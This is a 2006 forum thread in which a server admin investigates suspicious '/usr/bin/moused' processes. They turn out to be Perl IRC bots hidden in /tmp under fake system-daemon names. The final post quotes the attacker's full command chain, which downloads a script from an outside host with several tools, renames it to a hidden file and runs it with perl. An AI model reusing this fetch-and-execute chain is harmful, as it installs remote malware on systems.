phark
07-06-2006, 07:20 PM
I have a few dozen entries running that show up as "/usr/bin/moused".
Anyone have a clue about this?
Much appreciated!
Anyone have a clue about this?
Much appreciated!
 | View Full Version : /usr/bin/moused Jeff - Exceed 07-06-2006, 07:52 PM It's your console mouse daemon. phark 07-06-2006, 08:09 PM Thats what I suspected... I wonder what was making it go hay-wire.... someone at the datacenter playing? Ph well, I killed it a few times and it stopped. eth00 07-06-2006, 08:18 PM If you do not need the mouse you can also remove the rpms which run it :) phark 07-06-2006, 08:23 PM If you do not need the mouse you can also remove the rpms which run it :) Good point, thanks! :peace: AndyTork 08-17-2006, 03:12 AM I have a similar issues Lots of /usr/bin/moused tasks running, all using lots of CPU (upto 26%) I have no /usr/bin/moused file I have removed gpm rpm which is the conesole mouse services Any ideas? Ramprage 08-17-2006, 03:34 AM Sounds like a perl script or malicious binary running using a fake name. is it running as the nobody user or under apache - then its bad :) AndyTork 08-17-2006, 03:48 AM Yes it is, Just run a trace on it and it is bad Its trying to connect out to some website via IP address and connect via SSH No idea where it has come from, how it got installed and whats recreating it Any suggestions where to go from here tracking it ? Or know a good security expert that could go fix it ? Any help / pointers is appreciated AndyTork 08-17-2006, 09:15 AM Found a couple of nasty (but very well programmed) perl scripts that connect to IRC and also download from a couple of preconfigured URL's They were running from /tmp (should have secured tmp better, silly me), assuming Files were gb.txt.1 & gugl.txt.1 They disguised themselves as /usr/bin/moused' and /usr/sbin/usbd They came from http://nagar.ro/ using the "cd /tmp;wget http://nagar.ro/gb.txt;mv gb.txt .manb;perl .manb;curl -O http://nagar.ro/gb.txt;mv gb.txt .manb;perl .m anb;lwp-download http://nagar.ro/gb.txt;mv gb.txt .manb;perl .manb;lynx -source http://nagar.ro/gb.txt >gb.txt;perl gb.txt;fetc h http://nagar.ro/gb.txt;mv gb.txt .manb;perl .manb;GET http://nagar.ro/gb.txt;mv gb.txt .manb;perl .manb; touch /tmp/sess_b62d w41904ee88gu I have totally revised the security and checked against all online "Howto's" and security alerts, guess this will teach me to be a little more concious of these things |